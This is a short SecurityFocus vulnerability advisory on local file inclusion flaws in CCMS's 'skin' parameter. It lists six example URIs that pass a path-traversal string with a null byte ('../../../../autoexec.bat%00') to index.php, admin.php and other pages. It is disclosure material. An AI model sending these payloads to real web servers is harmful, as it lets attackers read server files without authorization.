Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

CCMS 'skin' Parameter Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/index.php?skin=../../../../autoexec.bat%00
http://www.example.com/forums.php?skin=../../../../autoexec.bat%00
http://www.example.com/admin.php?skin=../../../../autoexec.bat%00
http://www.example.com/header.php?skin=../../../../autoexec.bat%00
http://www.example.com/pages/story.php?skin=../../../../../autoexec.bat%00
http://www.example.com/pages/poll.php?skin=../../../../../autoexec.bat%00







 

Privacy Statement
Copyright 2008, SecurityFocus